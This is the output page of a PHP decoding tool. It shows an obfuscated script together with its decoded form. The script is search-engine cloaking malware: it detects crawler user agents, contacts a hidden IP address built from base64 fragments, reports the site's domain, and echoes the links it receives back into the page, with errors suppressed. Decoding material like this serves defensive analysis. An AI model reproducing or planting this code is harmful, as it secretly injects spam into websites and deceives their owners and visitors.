Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto vb5zW; MirN8: if (strpos($botbotbotbot, "\x6f\157\147\154\145") or strpos($bo..
Decoded Output download
<?php
goto vb5zW; MirN8: if (strpos($botbotbotbot, "oogle") or strpos($botbotbotbot, "ing") or strpos($botbotbotbot, "ahoo")) { $xxx = base64_decode("NjU="); $xxx1 = base64_decode("MjE="); $xxx2 = base64_decode("MjM1"); $xxx3 = base64_decode("MjUx"); $xxx4 = base64_decode("aW5wdXQ="); $xxx0 = base64_decode("aHR0cDovLw=="); $xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3; $xxx11 = $xxx4 . "/?useragent=" . $botbotbotbot . "&domain=" . $_SERVER["HTTP_HOST"]; $url = $xxx0 . $xxx00 . "/" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "href=") < 1) { $result = @file_get_contents("{$url}"); echo $result; } if (strpos($result, "href=") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr} ({$errno})<br />\xa"; } else { $req = "/" . $xxx11; $out = "GET {$req} HTTP/1.0\xd
"; $out .= "Host: {$url}
"; $out .= "Connection: Close\xd
\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto jFCJE; kGJqa: $botbotbotbot = str_replace(" ", "-", $botbotbotbot); goto MirN8; IOWJN: $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"]; goto kGJqa; vb5zW: @error_reporting(0); goto IOWJN; jFCJE: ?>
<?php
?>Did this file decode correctly?
Original Code
<?php
goto vb5zW; MirN8: if (strpos($botbotbotbot, "\x6f\157\147\154\145") or strpos($botbotbotbot, "\151\156\147") or strpos($botbotbotbot, "\x61\150\157\x6f")) { $xxx = base64_decode("\x4e\x6a\x55\75"); $xxx1 = base64_decode("\115\x6a\x45\x3d"); $xxx2 = base64_decode("\x4d\x6a\115\61"); $xxx3 = base64_decode("\x4d\x6a\x55\170"); $xxx4 = base64_decode("\x61\127\65\167\144\130\x51\75"); $xxx0 = base64_decode("\x61\110\122\60\x63\104\x6f\166\x4c\167\75\75"); $xxx00 = $xxx . "\56" . $xxx1 . "\x2e" . $xxx2 . "\x2e" . $xxx3; $xxx11 = $xxx4 . "\x2f\x3f\165\x73\x65\162\x61\x67\145\156\164\x3d" . $botbotbotbot . "\46\144\x6f\x6d\141\x69\x6e\x3d" . $_SERVER["\110\x54\x54\120\137\x48\x4f\x53\124"]; $url = $xxx0 . $xxx00 . "\57" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "\150\x72\145\146\75") < 1) { $result = @file_get_contents("{$url}"); echo $result; } if (strpos($result, "\x68\162\x65\x66\75") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\74\x62\x72\x20\x2f\x3e\xa"; } else { $req = "\x2f" . $xxx11; $out = "\107\105\x54\x20{$req}\x20\x48\124\x54\120\x2f\61\x2e\x30\xd\12"; $out .= "\110\x6f\163\x74\x3a\x20{$url}\15\12"; $out .= "\103\157\156\x6e\145\x63\x74\x69\x6f\x6e\72\40\x43\x6c\x6f\163\145\xd\12\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; echo $text; } } goto jFCJE; kGJqa: $botbotbotbot = str_replace("\40", "\x2d", $botbotbotbot); goto MirN8; IOWJN: $botbotbotbot = "\x2e\56\x2e" . $_SERVER["\x48\124\124\x50\137\x55\123\105\122\x5f\101\x47\x45\x4e\x54"]; goto kGJqa; vb5zW: @error_reporting(0); goto IOWJN; jFCJE: ?>
<?php
Function Calls
| None |
Stats
| MD5 | 6ef547419fb7f50d8c42729bdc192fe0 |
| Eval Count | 0 |
| Decode Time | 67 ms |